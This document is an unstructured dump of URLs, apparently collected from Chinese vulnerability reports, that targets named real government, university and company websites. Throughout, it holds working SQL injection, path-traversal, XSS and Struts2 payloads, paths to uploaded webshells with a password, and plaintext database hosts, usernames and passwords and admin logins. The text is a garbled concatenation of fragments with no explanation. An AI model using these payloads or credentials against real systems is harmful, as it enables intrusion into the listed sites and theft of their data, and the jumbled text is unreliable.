task.csdn.net/m/task/home?task_id=143 http://event.dota2.com.cn/dota2/seattle/order?pageNo=1&pageSize=10 http://event.dota2.com.cn/dota2/seattle/pagination?pageNo=1&pageSize=10 http://61.178.220.149:8099/ewebeditor/admin/ http://61.178.220.149:8099//ewebeditor/uploadfile/20140611010924268.jsp http://www.czj.uestc.edu.cn存在漏洞 http://202.115.18.3/ncre/Login!input.action http://dhadb.dha.ac.cn/getJjyz!getGuide_jjyzpz.action http://mwa.sinomed.ac.cn/display!findPeriodicalById.action http://lib.ciomp.ac.cn/webs/modlenews_resu.action http://www.yunyin.com/ics/case/client.cfm http://www.sdxjpc.com/CFIDE/administrator/logging/settings.cfm?locale=../../../../custommenu.xml%00en http://www.rymusic.com.cn/CFIDE/administrator/logging/settings.cfm?locale=../../../../custommenu.xml%00en www.yljy.com http://java.oracle.com/ http://aapi.sd.wanmei.com/ http://aapi.sd.wanmei.com/index.php/api/goods/getList?limit=10&offset=0&usage= http://aapi.sd.wanmei.com/index.php/api/goods/getTransactionList?goods_id=&limit=10&offset=0 http://detail.1688.com/offer/36781372993.html http://hxey.motherchildren.com:11111/ http://www.teatreexy.com/learningCenter/Default.aspx http://www.teatreexy.com/exchange/discussdetails.aspx?DID=100 http://www.chinaacc.com/tougao/2014_5/22_069518264112213412.shtml http://211.137.243.2:10001/partner/ lihonglei:123456(权限较大,为省级审批权限,其他账号没怎么试) http://211.139.80.193/ http://218.200.48.73:9090/partner/ http://www.teatree.cn/ http://www.tuniu.com/tours/2322017 http://www.im286.com/forum.php?id=1 http://192.168.1.100/test2.asp?id=1%20un%ion%20se%l%e%ct%201,2,3,4,5,pass%20from%20manage http://www.im286.com/1.asp?id=1%20un%ion%20se%l%e%ct%201,2,3,4,5,pass%20from%20manage http://119.147.224.60 http://119.147.224.60/include http://www.jnlbb.cn/article_article.php?aid=149 http://220.181.184.125 http://220.181.184.125/modules/ http://www.etaoshi.com/member/DelAddressRecord/
http://218.176.242.13/#filter=0&newwindow=1&q=%E8%BD%AF%E4%BB%B6%E9%80%9A-%E4%B8%AD%E6%96%B0%E9%87%91%E6%A1%A5+inurl:softwarer&start=40 http://ideaclub.lenovo.com.cn/club/index.php?m=store&c=index&f=chkCity http://www.cert.org.cn/22.asp?id=1 htpp://192.168.1.100/test2.asp?id=1%20un%ion%20se%l%e%ct%201,2,3,4,5,pass%20from%20manage http://www.cert.org.cn/22.asp?id=1%20un%ion%20se%l%e%ct%201,2,3,4,5,pass%20from http://engtc.sjtu.edu.cn:81/teacher/index.aspx http://www.dlink.com.cn/admin/ http://site/homeLogin.action?redirect:http://www.sina.com/ http://www.shengjinsuo.com/Safety/ResetPwd.aspx?id=参数1&flag=参数2 http://yuedu.sogou.com http://yuedu.sogou.com/ajax/user/buy/?bkey=8EFEF77F4EB2AC17BA4028A98BC0D0F6 inurl:login http://ayyc.ttpod.com http://yjsy.xmu.edu.cn/hy/SystemLogin/SystemLogin.asp?ty=glry&no=1 www.xxxx.com/adm/ http://v.wanmei.com/ http://qiantu.xdf.cn/blog/BlogAdmin/Include/caseCommentList.jsp?ArticleID=1 http://qiantu.xdf.cn/blog/BlogAdmin/Include/caseCommentList.jsp?ArticleID=1 bdbrowser://tabpage/,【手动编辑】时,【最常访问】哪儿会出现访问的top8。结果网页的title没有编码直接写入导致xss。 http://db.health.hsw.cn/uc/AddUCConsumerAction.action http://db.health.hsw.cn/hospital/1609.shtml http://119.147.224.* http://119.147.224.168是个测试论坛 http://119.254.30.40/index.action https://wechat.yinxiang.com/en/authCallback.action https://tools.yinxiang.com/wb/auth.action http://www.changedu.com/ inurl:portal/department http://pan.baidu.com/share/link?shareid=3106765115&uk=1463633463 http://boss.tootoo.cn/ http://member.99114.com http://chanpay.chanjet.com/news_more.asp?id=10’ http://support.chanjet.com/Registration/adduser/adduser.rar http://hn.zhidao.189.cn/ http://www.teatree.cn/register_loading.aspx?RadomId=1 http://crm.99114.com/common/jsp/file.jsp看到这个页面能上传然后就试试看了,上传了个小马,结果找不到呀,随手试试,结果...下列目录呀...果断找到了小马...然后balabla...看到了CDEZ盘 http://crm.99114.com/business/ http://crm.99114.com/userfile/attach/ http://crm.99114.com/admin/ http://crm.99114.com/common/ http://checkin.99114.com/ 
http://weixin.homeinns.com/football/card.php?id=1402151210 http://weixin.homeinns.com/card/step2.php?id=1402576722 http://58.213.129.225/index.jsp http://58.213.129.225/news.jsp?guideid=4 http://pinge.focus.cn/u/set/ http://xm.jckjj.gov.cn:8080/jcshenbao/login.jspa http://che.zju.edu.cn/ http://che.zju.edu.cn/tpe973/admin/login.php http://matrix.mojichina.com http://matrix.mojichina.com/accounts#manage https://192.168.222.128/global_admin.ini http://www.hjzlg.com/web3%5Cycms_pic.asp?class=1&page=2 http://www.hjzlg.com/web3%5Cycms_pic.asp?class=1%20or%20%28select%20count%28*%29%20from%20msysaccessobjects%29&page=2 http://www.sxtc.com.cn/content.php?id=1009%20and%201=1%20&node=113 http://www.sxtc.com.cn/content.php?id=1009%20and%201=2%20&node=113 inurl:xmlpzs/nowdetail.asp inurl:xmlpzs/jgdetail.asp inurl:xmlpzs/bsdetail.asp inurl:xmlpzs/fwsyqdetail.asp http://www.tazzfdc.com/bit-xxzs/xmlpzs/nowdetail.asp?id=200809250108 http://www.lzfg.com.cn/bit-xxzs/xmlpzs/nowdetail.asp?id=206806 http://www.whxfdc.com/bit-xxzs/xmlpzs/nowdetail.asp?id=10631 http://www.zmdfcxx.com/bit-xxzs/xmlpzs/nowdetail.asp?id=42067 http://www.ynfgj.gov.cn/bit-xxzs/xmlpzs/nowdetail.asp?id=4446 http://www.dyfc.gov.cn/bit-xxzs/xmlpzs/nowdetail.asp?id=401103 http://sys.syfdc.gov.cn/tt/bit-xxzs/gs/xmlpzs/nowdetail.asp?id=770723 http://218.84.62.161:8081/bit-xxzs/xmlpzs/nowdetail.asp?id=356559 http://www.xjksfcw.com/bit-xxzs/xmlpzs/nowdetail.asp?id=200906090066 http://beian.xtfdc.gov.cn/bit-xxzs/xmlpzs/nowdetail.asp?id=253989 http://www.dzxfdc.com/bit-xxzs/xmlpzs/nowdetail.asp?id=10459 http://www.xyfg.gov.cn/bit-xxzs/xmlpzs/nowdetail.asp?id=201101300004 http://gs.wf777.com/bit-xxzs/xmlpzs/nowdetail.asp?id=200909280804 http://www.lwfccs.com/bit-xxzs/xmlpzs/nowdetail.asp?id=200809250108 http://222.89.166.137/bit-xxzs/xmlpzs/nowdetail.asp?id=200809250108 http://61.185.69.154/bit-xxzs/xmlpzs/jgdetail.asp?objid=16&stype=kfgl http://www.bjsfdc.com.cn/bit-xxzs/xmlpzs/jgdetail.asp?objid=16&stype=kfgl 
http://219.154.46.179:8080/bit-xxzs/xmlpzs/bsdetail.asp?id=201406090106 http://www.cjfcw.com/bit-xxzs/xmlpzs/bsdetail.asp?id=526399 http://218.59.136.19/bit-xxzs/xmlpz/bsdetail.asp?id=201209130361 http://60.31.254.197/bit-xxzs/xmlpzs/bsdetail.asp?id=960100 http://www.ynfgj.gov.cn/bit-xxzs/xmlpzs/bsdetail.asp?id=607 http://www.szshouse.com/bit-xxzs/xmlpzs/fwsyqdetail.asp?id=201405220187 http://www.teatree.cn/register_success.aspx?LoginName=1 http://a.chanjet.com/fckeditor/editor/filemanager/connectors/test.html http://a.chanjet.com/fckeditor/editor/filemanager/connectors/uploadtest.html http://119.253.53.23/ http://www.spider.com.cn/forgetPasswordStepModify.html http://www.yingrongda.com/yrd/index!index.action http://tltblogxss.blog.sohu.com/ http://www.dameng.com/admin/Login.aspx host:121.14.161.118 port:8405 user:root pwd:root123 MYSQL_HOST:121.14.161.221 host:121.14.161.221 port:3306 user:uae_dev pwd:AYA5tVne http://mi.gxu.edu.cn/content.php?id=1356 http://www.changedu.com/ http://desktop.nju.edu.cn/cx/ http://dxscx.forestpolice.net/ http://180.209.64.18/cxcy/Index.aspx http://210.26.14.200/ http://sjjx.njit.edu.cn/cx/ http://nausrt.njau.edu.cn/ http://202.195.237.148/dcxm/Index.aspx http://sy.cxxy.seu.edu.cn/cx/ http://cx.njxzc.edu.cn/ http://210.38.64.108/cx/ http://cx.yctc.edu.cn/ http://cxsb.yzu.edu.cn/ http://cxcy.shisu.edu.cn/ http://cxcy.lzu.edu.cn/Index.aspx http://210.46.116.20/ http://jw1.jiangnan.edu.cn/dxscx/ http://202.119.81.120/ http://bylw.pk.njau.edu.cn/gxycx/ http://zheye.cc/index.php/Home/Index/edit_address_ajax?name=test123&url=http%3A%2F%2Fs.click.taobao.com&aid=259045 http://zheye.cc/3626 http://zheye.cc/3629 http://zheye.cc/3629中产生了变化。 http://submit.duote.com/1.txt http://guest.jiajiang.gov.cn/index.do URL:http://203.95.110.84/ http://203.95.110.84/1.asp;.txt http://labs.chinamobile.com/imic/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fvar%252Fwww%252Fmobilehub%252Fwww%252Fincludes%252Fsettings.php%2500.jpg 
http://labs.chinamobile.com/zhanhui/show/qiye/id/ http://mail.zisu.edu.cn/zisu.edu.cn.txt http://bbs.tiantian.com/.svn/entries https://login.homeinns.com http://www.homeinns.com/Test http://219.242.65.10/Recommend.aspx?action=UpdateClick&GUID=cc2fc0c0-13e3-4e6b-b1ff-ffa67bf30c97 http://219.242.65.10/fsweb/MakeIntert.aspx?ID=123 http://219.242.65.10/SubjectSearch.aspx?cn=64 http://219.242.65.10/fsweb/ViewOpern.aspx?ID=737124 http://wooyun.org/bugs/wooyun-2013-024770 http://wooyun.org/bugs/wooyun-2010-064342 http://ie.sogou.com/user/head.html?size=../../../../../../../../../etc/passwd%00.jpg inurl:/queryIn.jsp http://www.bcrj.com.cn/ http://202.118.8.2:8080/board/login.jsp?kind=login http://202.118.8.2:8080/opac_two/board/login.jsp?kind=login http://lib.cuc.edu.cn/opac_two/board/login.jsp?kind=login http://218.195.18.6:8082/board/login.jsp?kind=login http://202.197.224.89:8088/opac_two/board/login.jsp?kind=login http://202.118.8.2:8080 URL:http://www.linuxdiyf.com/viewthread.php?tid=276020&extra=page%253D&page=1 http://sp.hnppb.gov.cn/ http://wandou.im/a1gz7 http://www.72xuan.com/goods/?color=11 http://www.ceshizhandian.edu.cn/_web/ids/userRegister.do?_p=YXM9MSZwPTEmbT1OJg__ http://www.ceshizhandian.edu.cn//_web/ids/initPasswordRecoveryApply.do?_p=YXM9MSZ0PTAmcD0xJm09TiY_&t=0.3189659991047933 http://www.ceshizhandian.edu.cn/_web/ids/passwordRecoveryApplyResetPassword.do?_p=YXM9MSZ0PTAmcD0xJm09TiY_&key=27b09e73-8b7d-4575-aed5-aad9fb28478a http://www.ceshizhandian.edu.cn/_web/ids/resetNewPasswordRecoveryApply.do?loginName=test1&key=27b09e73-8b7d-4575-aed5-aad9fb28478a&_p=YXM9MSZ0PTAmcD0xJm09TiY_ http://www.ceshizhandian.edu.cn/_web/ids/passwordRecoveryApplyResetPassword.do?_p=YXM9MSZ0PTAmcD0xJm09TiY_&key=27b09e73-8b7d-4575-aed5-aad9fb28478a http://www.78oa.com/download/download42.html http://v4.78oa.com http://nx.bnet.cn http://nx.bnet.cn/sql/.svn/entries http://nx.bnet.cn/download/.svn/entries http://nx.bnet.cn/css/.svn/entries http://nx.bnet.cn/FCKeditor/.svn/entries 
http://nx.bnet.cn/image/.svn/entries http://nx.bnet.cn/images/.svn/entries http://nx.bnet.cn/js/.svn/entries http://nx.bnet.cn/lhzx/.svn/entries http://nx.bnet.cn/META-INF/.svn/entries http://nx.bnet.cn/public/.svn/entries http://nx.bnet.cn/version/.svn/entries jdbc:oracle:thin:@10.10.0.5:1521:zjhcsyst jdbc:oracle:thin:@172.31.21.138:1521:happy jdbc:oracle:thin:@10.80.10.226:1521:zjhc jdbc:oracle:thin:@10.80.10.180:1521:zjhc jdbc:oracle:thin:@10.80.10.226:1521:zjhc jdbc:oracle:thin:@10.80.10.180:1521:zjhc jdbc:oracle:thin:@10.10.0.5:1521:zjhcsyst jdbc:oracle:thin:@10.80.10.22:1521:bizpower jdbc:oracle:thin:@172.31.21.138:1521:happy http://cqtbf.njut.edu.cn/m/Newshowpage.aspx?id=18 http://cqtbf.njut.edu.cn/m/Newshowpage.aspx?id=18'%20and%201=2%20union%20all%20select%201,2,3,4,'5',6,7,8,9-- http://http://share.ucweb.local/discuz/ http://hg.ucweb.local/packer http://portal.ucweb.local/portal/proxy?action=performance%3Akpi%3Aget_kpi_item&_dc=1402633576074&cycle_id=23&kpi_item_id=50229&cur_action_base_status=1 url:http://***.uc.cn:8040/portal_***/ https://******.test1.9game.cn/ port:3306 user:ucgc_management port:3306 user:optest password:optest port:3355 password:ucw******yf host:121.14.161.118 port:8405 user:root password:root123 host:121.14.161.221 port:3306 user:uae_dev password:AY*****ne host:119.147.224.171 port:3306 user:nemo password:nemo http://www.wooyun.org php:47),关键看其中怎么过滤后缀的: http://ffp.xiamenair.com/About/Regist.aspx http://ffp.xiamenair.com/About/Regist.aspx http://www.sdlgcj.net/sdlgcj/news.jsp?id=6103 http://cssotest.kingdee.com/knowledge/search/searchKnowledge!knowledgeSearch.action?produceId=1003&ids=1140&id=1140&secondId=&versionId=0&currPage=2 http://u.izptec.com/login.php http://u.izptec.com/register.php http://u.izptec.com//manage_user.php?action=edituser&managerid=hacktest&type=hacktest http://u.izptec.com//manage_user.php?action=edituser&managerid=admin&type=admin http://www.ltxyt.com/xyt/dx/news/newsinfo.aspx?id=2178 
inurl:info_Print.asp?ArticleID= http://www.hlbrc.cn/ http://www.cstqxx.com/ http://economy.njau.edu.cn:8011/ http://www.fushanedu.cn/ http://www.jn15zhong.cn/ http://www.rcsjyw.cn/ shell:http://edoas.scedu.net:8080/oa/css3.jsp pass:chopper inurl:menuInfo.do?nodeid= http://www.dgjsjd.net:8080/dgjdwz/menuInfo.do?nodeid=04&newsType=gcjd http://jdz.gzcc.gov.cn:8000/gzsznew/menuInfo.do?nodeid=02&newsType=gyzjz http://www.hkjsjd.cn/menuInfo.do?nodeid=08&newsType=jcjg http://www.sjzzjz.com:8000/news/menuInfo.do?getChild=yes&nodeid=0401 http://www.hngczl.com.cn:8080/news/menuInfo.do?nodeid=0808 https://github.com/search?q=noreply%40wandoujia.com&type=Code&ref=searchresults http://www.tyfda.gov.cn/web/tytwo/type.asp?rightid=48&sup_rightid=47&webmoreid=1361 http://fulian.wst.cn/qa/ShowQuestion.asp?id=15 http://192.168.100.235:1234/index.php http://www.lottery.org.cn/)存在注入漏洞,有漏洞的网址是http://lottery.org.cn/,可通过注入获得网站账号密码, http://222.184.252.156/jslyqtgz/manage/ns_toshouye.do?webid=gz http://222.184.252.156/jslyqtgz/toole/index.jsp http://222.184.252.156/jslyqtgz/fontse/index.html http://222.184.252.156/jslyqtgz/web.jsp http://222.184.252.156/jslyqtgz/date.jsp http://222.184.252.156/jslyqtgz/guige.jsp http://222.184.252.156:8080/workfield/employee_login.do http://www.hbrsks.cn:85/ http://house.wst.cn/NewHouse/ShowJiage.asp?HouseID=951 http://www.akgqt.com/xsh/admin/Admin_login.asp https://github.com/alphachoi/lab/blob/80ea76b87a9929d34ca9250e28f0fa30ccf00dd2/sendmail/sendmail.py http://117.135.151.44/server-status http://117.135.151.41/status http://117.135.151.245:80/status http://8.37.228.171/info http://atp****.unionpay.com/admin/auth/login http://t3serv002.mit.edu:50070/ http://60.28.205.41:8280/KuwoEdit/upPic/upPic.jsp http://img1.kwcdn.kuwo.cn/star/upload/5/5/1402715234581_.html http://vip.cn99.com/ http://180.110.91.28:80 https://online.unionpay.com/static.zip http://online.unionpay.com/static.zip http://tnet1.theti.org/evaluate/index.do 
http://online.ncu.edu.cn/eol/homepage/common/ http://pt.csust.edu.cn/eol/homepage/common/ http://eol.kmust.edu.cn/eol/homepage/common/ http://jxpt.cuit.edu.cn/eol/homepage/common/ http://met2.fzu.edu.cn/eol/homepage/common/ http://eol.cqu.edu.cn/eol/homepage/common/ http://eol.shzu.edu.cn/eol/homepage/common http://jx.gznu.edu.cn/eol/homepage/common/ http://eol.mju.edu.cn/eol/homepage/common/ http://e-learning.hznu.edu.cn/eol/homepage/common http://pt.csust.edu.cn/eol/homepage/common/ http://pt.csust.edu.cn/eol/popups/viewstudent_info.jsp?SID=99086&from=welcomepage http://**.unionpay.com/admin/auth/login http://www.wshang.com/about/txws.html http://i.wshang.com/Login/Default/Register.html http://xss.re/4914 http://xss.re/4914 http://count.wxjy.com.cn/count//counter.asp?user=90years http://www13.f5.bjjs.gov.cn/dig/search.action http://www13.f5.bjjs.gov.cn/dig/search.action?redirect:%25{3*4 http://www.zhaokao.net/kaowu.jsp?oid=19060 http://usports.tongji.edu.cn/plus usports.tongji.edu.cn/tj http://usports.tongji.edu.cn/plus/style.php http://usports.tongji.edu.cn/phpcms/index.php club.1hai.cn/cluborderdetail.aspx?confno=8000003848 http://news.xauat.edu.cn/read.php?classid=40&newsid=8083 http://peixun.eol.cn/interface/js/class_list_hubei.php?provinceid=42&sortid=3_62&callback= http://kechenggezi.com/users/infos.json?ids[]=user_id即可获取用户资料 http://ghc81.ghc.andrew.cmu.edu:50070/ http://220.181.167.34/_online/cacti/graph_view.php http://220.181.167.34/_logcrawler/ http://220.181.167.34/url/home/ site:js.189.cn http://club.xywy.com/static/20130128/18171956.htm http://kbs.cnki.net/forums/forums/ d9c2:8bae f5fe:3638 f5fe:3638 http://dasai.zzstep.com/dasai/aiyuzhihui/show.php?id=4389 http://t.hujiang.com/ http://bulo.hujiang.com/app/music/ http://www.ccgp-qinghai.gov.cn/new.jsp?id=392 ftp://yollyah.com http://218.29.79.80/senior/policy/?type=02” http://60.12.108.50:8080/fckeditor/editor/filemanager/browser/default/browser.html?Connector=connectors/jsp/connector 
http://m.998.com/ http://m.998.com/Api/Account/SendMobileCheckMsg.ashx http://m.998.com/phone_order.html,验证码同样是这样的神逻辑。这样做是为了让前端做短信验证码的验证。前端的验证还是很容易干掉的,短信验证码完全没用了。 http://m.998.com/Api/User/GetOrderList.ashx?cardNo=0&phone=18000000000&orderListType=1&page=1&pageSize=10 http://m.998.com/Api/User/GetOrderList.ashx?cardNo=100001450000&phone=&orderListType=2&page=1&pageSize=10 http://www.filteco.com/news_s.asp?id=11%27 http://www.dctennis.cn/news_c.php?id=210%27 http://www.laoxiangren.cn/news_c.php?id=48&cf=news%27 http://www.vazbrand.com/product_detail.asp?id=1222%27 http://www.fsfhad.com/news_c.php?id=326%27 inurl:Course_Default.aspx http://www.forestry.gov.cn/ http://www.forestry.gov.cn/DownloadFile.jsp?filename=../WEB-INF/struts/struts-config.xml http://www.forestry.gov.cn/DownloadFile.jsp?filename=../DownloadFile.jsp http://www.mayiyou.com/News/NewsList.aspx?Category=2 http://hh.mayiyou.com/NewsList.aspx?Category=143 http://fy.mayiyou.com/NewsList.aspx?Category=137 http://ns.mayiyou.com/NewsList.aspx?Category=87 inurl:php?id= http://wooyun.org/bugs/wooyun-2014-053822 http://www.ahcjwx.com/help_Info.aspx?infoid=2046 http://www.ahcjwx.com/TeacherInfo.aspx?infoId=2026 http://www.ahcjwx.com/St_Stu_Thinking_Minute.aspx?info=4127 http://www.ahcjwx.com/FaceCourseInfo.aspx?infoid=22 http://www.ahcjwx.com/ShopInfo.aspx?infoid=4111 http://www.ahcjwx.com/CjzxInfo.aspx?infoid=117 http://chinakjzj.com/Web_Org/Qa_Quert.aspx?info3=4102 http://ysxy.jjplay.com/show.php?id=88 http://bbs.xyl.gov.cn/admin.php http://wooyun.org/bugs/wooyun-2010-011354 http://jasinda.sysu.edu.cn/jasinda/web.jsp http://210.31.104.8/display.php?ii_id=1073 http://210.31.104.8/display.php?ii_id=1073 http://sqlmap.org http://shhj.k-touch.cn/appfen/deallist.aspx http://www.ahszkj.gov.cn/vote/vote_view.php?id=1 http://mail.***.edu.cn http://hack.com/coremail/s?func=user:proxyGet&sid=CAPplXssSmOlqAgclQsslyZkmdzLcYdA&mid=2:1tbiAgQPE1KpqPIw4QAAsq&url=csrf.jpg http://hack.com/coremail/s/index.php 
http://127.0.0.1/index.php?s=/InfoDetail/infodetail/tted http://sqlmap.sourceforge.net http://portal.ucweb.com/portal www.baidu.com”等等加入浏览器的黑名单,用户访问,UC浏览器就拦截了,然后.......这个平台可以做的事情还有很多,向用户推送什么什么的都是可以的(截图留念退出) www1.jiande.gov.cn/web/CFCount/Data/ http://feedback.vip.com/feedback!detailFeedback.do?ua_id=124435&childKind=11 http://xsl.zjou.edu.cn/Admin/Default.aspx http://www.chinaunicombidding.cn/ http://www.yfci.cn/wooyun.txt http://www.hrss.jldl.gov.cn/index.php?act=article&doing=list&cid=11 http://www.hrss.jldl.gov.cn/index.php?act=article&doing=list&cid=11 http://www.dianping.com/member/22398119/reviews?reviewCityId=0&reviewShopType=10&c=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&shopTypeIndex=1 www.dianping.com http://www.dianping.com http://www.letushuo.com/group/topic/topicid-240 http://up.51xxs.com/users/public/1402767480_224122.swf http://demo.thinksns.com/t3/weiba/post_2075 www.dgtoyota.com http://www.dgtoyota.com/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20%20or%20mid=@%60\%27%60%20/*!50000union*//*!50000select*/1,2,3,%28select%20CONCAT%280x7c,userid,0x7c,pwd%29+from+%60%23@__admin%60%20limit+0,1%29,5,6,7,8,9%23@%60\%27%60+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=6878 http://www.zjsmzw.gov.cn/zjsmzw.rar www.fzyb.gov.cn www.fzyb.gov.cn/dwgzsj/0000******.txt http://ce.wooyun.org/discuss/comment/25 http://www.chinabidding.com.cn/zbw/zxzx/zxzx_show.jsp?record_id=8290587 http://kjxm.szkj.gov.cn/search.aspx?type1=1&type2=1&key=2013 http://kjxm.szkj.gov.cn/search.aspx?type1=1&type2=1&key=2013% http://chem.sicnu.edu.cn/。 http://chem.sicnu.edu.cn/subpage/eventmsg.aspx?ID=11。放在sqlmap里面验证一下我们的说法。 http://zhgl.sicnu.edu.cn/ http://218.70.37.65:8080/index.do http://218.70.37.65:8080/load.do?infoId=35 http://cms.kingdee.com/solutions/business/finance/financeCaseList.jsp?columnId=148201301401 
https://seyb.szsi.gov.cn/szwcngr/prg1/slgrcbnew-fw-sq-view.jsp?EventID=CBR_GRCBQUEERY_Action&GRCODE=5005*****&DZSH=2&csrftoken=3e8bfba2935484f4109a597500f0cf1c url:http://demo.cuumall.com/index.php/home/detail/index/id/360 http://www.wrigley.com.cn site:wrigley.com.cn http://elearning.wrigley.com.cn/login.action http://elearning.wrigley.com.cn/password!retrievePwd.action http://elearning.wrigley.com.cn/login.action?redirect:http://www.baidu.com/;网页成功重定向到百度,说明struts2未打补丁,漏洞依然存在。 http://xxx/xss_csrf_shell.js http://www.zyshbj.gov.cn http://www.zyshbj.gov.cn/upload/sa.asp http://www.qlagr.gov.cn http://www.qlagr.gov.cn/c.php http://www.hyswsj.gov.cn/ http://www.hyswsj.gov.cn/123.aspx http://www.nchbj.gov.cn/ http://www.nchbj.gov.cn/admin/2.asp http://www.bzstjj.gov.cn/ http://www.bzstjj.gov.cn/11.asp http://www.dianping.com/shop/1798321/officialphotos/album/tag-1631_%e5%85%a8%e9%83%a8_%e5%85%a8%e9%83%a8_%e6%ac%a7%e7%be%8e%e5%a4%a7%e6%b0%94_%e5%85%a8%e9%83%a8 http://www.dianping.com/shop/1798321/officialphotos/album/tag-1631_%e5%85%a8%e9%83%a8_%e5%85%a8%e9%83%a8_%e6%ac%a7%e7%be%8e%e5%a4%a7%e6%b0%94_%e5%85%a8%e9%83%a8 inurl:cms/sites/nanhai/info_ajax.jsp?columnid= http://www.wandafilm.com/WEB-INF/classes/jdbc.properties jdbc:oracle:thin:@192.***.***.68:1521:ora10g jdbc:oracle:thin:@192.*.*.68:1521:ora10g jdbc:oracle:thin:wd_we***/wd_w***@10.*.*.167:1521:ora10g http://www.ncfdj.gov.cn/admin/Admin_meun.aspx inurl:cms/sites/nanhai/info_ajax.jsp?columnid= http://www.nanhai.gov.cn/cms/sites/nanhai/info_ajax.jsp?columnid=8093&infoid=20140515160815837761427 http://jiujiang.nanhai.gov.cn/cms/sites/nanhai/info_ajax.jsp?columnid=8093&infoid=20140515160815837761427 http://rencai.nanhai.gov.cn/cms/sites/nanhai/info_ajax.jsp?columnid=8093&infoid=20140515160815837761427 http://sifa.nanhai.gov.cn/cms/sites/nanhai/info_ajax.jsp?columnid=8093&infoid=20140515160815837761427 http://www.xzzf.cn/cms/sites/nanhai/info_ajax.jsp?columnid=8093&infoid=20140515160815837761427 
http://www.nhjmw.gov.cn/cms/sites/nanhai/info_ajax.jsp?columnid=8093&infoid=20140515160815837761427 http://www.shishan.gov.cn/cms/sites/nanhai/info_ajax.jsp?columnid=8093&infoid=20140515160815837761427 http://3g.paybest.cn/abc_drawing.php?drawing=4 http://www.paybest.cn/ http://www.paybest.cn/robots.txt/.php http://i.178.com/~index.index?uid=1 http://www.sinopecsales.com/gas/res/html/register.jsp http://www.sinopecsales.com/gas/res/html/getpassReal.jsp http://202.105.134.105/login.do http://202.105.134.105/teamserver/faces/ http://202.105.134.105/resManagement/ http://202.105.134.160:8080/ http://www.ybzwsxf.gov.cn/Account/Register1/?UID= http://www.ybzwsxf.gov.cn/AllList/Details/?Code= http://www.ybzwsxf.gov.cn/Account/Register1/?UID= http://www.ybzwsxf.gov.cn/AllList/Details/?Code= http://www.ybzwsxf.gov.cn/Account/Register1/?UID=%27%3B+WAITFOR+DELAY+%270%3A0%3A0%27%3B--+;和 http://www.ybzwsxf.gov.cn/AllList/Details/?Code=%27%3B+WAITFOR+DELAY+%270%3A0%3A0%27%3B--+可以触发sql注入漏洞。其中 http://www.ybzwsxf.gov.cn/Account/Register1/?UID=%27%3B+WAITFOR+DELAY+%270%3A0%3A0%27%3B--+可以被利用开启一个远程shell,进而执行系统管理员命令,控制整个服务器系统;而http://www.ybzwsxf.gov.cn/AllList/Details/?Code=%27%3B+WAITFOR+DELAY+%270%3A0%3A0%27%3B--+ http://202.102.40.94:8080---admin---123456 http://118.85.194.82/---admin---admin http://www.eset.com.cn//download/detail/?product=EAV6 http://www.txwl.cn/case.aspx?cid=763873 http://218.5.1.247:81/gxmh/login.aspx http://www.fjxwcbj.gov.cn/Gxmh/login.aspx http://www.fjaudit.gov.cn/gxmh/login.aspx http://www.fjagri.gov.cn:5501/gxmh/login.aspx http://www.fjrf.gov.cn/Gxmh/login.aspx http://www.fjetc.gov.cn/gxmh/login.aspx http://www.fjphb.gov.cn/Gxmh/login.aspx http://61.154.12.104/Gxmh/login.aspx www.pezx.gov.cn/linkclick.asp?Id=13 http://xss.hk/XIKZ2D?1402886265 http://blog.xiachufang.com/?author=1 http://speed.56.com/pma/ http://speed.56.com/pma/main.php http://116.228.70.245/logout.aspx 
http://116.228.70.245/NewFabu/NFB_IT.aspx?depart=%D0%C5%CF%A2%BC%BC%CA%F5%B9%DC%C0%ED%D6%D0%D0%C4 http://wo.zdnet.com.cn/files/list.php?c4=1524【注入点】 http://wo.zdnet.com.cn/files/list.php?c1=146【注入点】&c2=902【注入点】 http://shop.ehuatai.com/esale/login/loginAction-login.action?selProvince=901&selCity= http://www.fsmcms.com.cn/) inurl:fsmcms http://www.hzdzkjy.com/fsmcms/cms/leadermail/p_replydetail.jsp?MailId=20130617090041439521995 http://xfj.wuhai.gov.cn/fsmcms/cms/leadermail/p_replydetail.jsp?MailId=20130617090041439521995 http://www.btgaj.gov.cn/fsmcms/cms/leadermail/p_replydetail.jsp?MailId=20130617090041439521995 http://lclyw.gov.cn/fsmcms/cms/leadermail/p_replydetail.jsp?MailId=20130617090041439521995 http://www.cnfia.cn/fsmcms/cms/leadermail/p_replydetail.jsp?MailId=20130617090041439521995 http://www.nm166.com/fsmcms/cms/leadermail/p_replydetail.jsp?MailId=20130617090041439521995 http://www.gxhzjw.gov.cn/fsmcms/cms/leadermail/p_replydetail.jsp?MailId=20130617090041439521995 http://110.17.162.177/fsmcms/cms/leadermail/p_replydetail.jsp?MailId=20130617090041439521995 http://www.hzdzkjy.com/fsmcms/cms/leadermail/p_replydetail.jsp?MailId=20130617090041439521995 http://xfj.wuhai.gov.cn/fsmcms/cms/leadermail/p_replydetail.jsp?MailId=20130617090041439521995 http://lclyw.gov.cn/fsmcms/cms/leadermail/p_replydetail.jsp?MailId=20130617090041439521995 http://www.cnfia.cn/fsmcms/cms/leadermail/p_replydetail.jsp?MailId=20130617090041439521995 http://www.gxhzjw.gov.cn/fsmcms/cms/leadermail/p_replydetail.jsp?MailId=20130617090041439521995 http://www.ebupt.com/list/roll/fnavid/26* http://shop.paixie.net/ http://shop.paixie.net/apply.html?step=1 http://img-cdn2.paixie.net/newspic/20140616/14029079575bfb68.jpg/xx.php http://pximg2.paixie.net/paixie/201406/13/140266680845674_thumb_12896.jpg/xx.php http://pximg2.paixie.net/paixie/201406/13/140266680845674.jpg/xx.php admin:admin http://cc.shnu.edu.cn/20140624172345427.txt http://74.125.227.77/ http://58.51.84.81:8088/sdh/login.action 
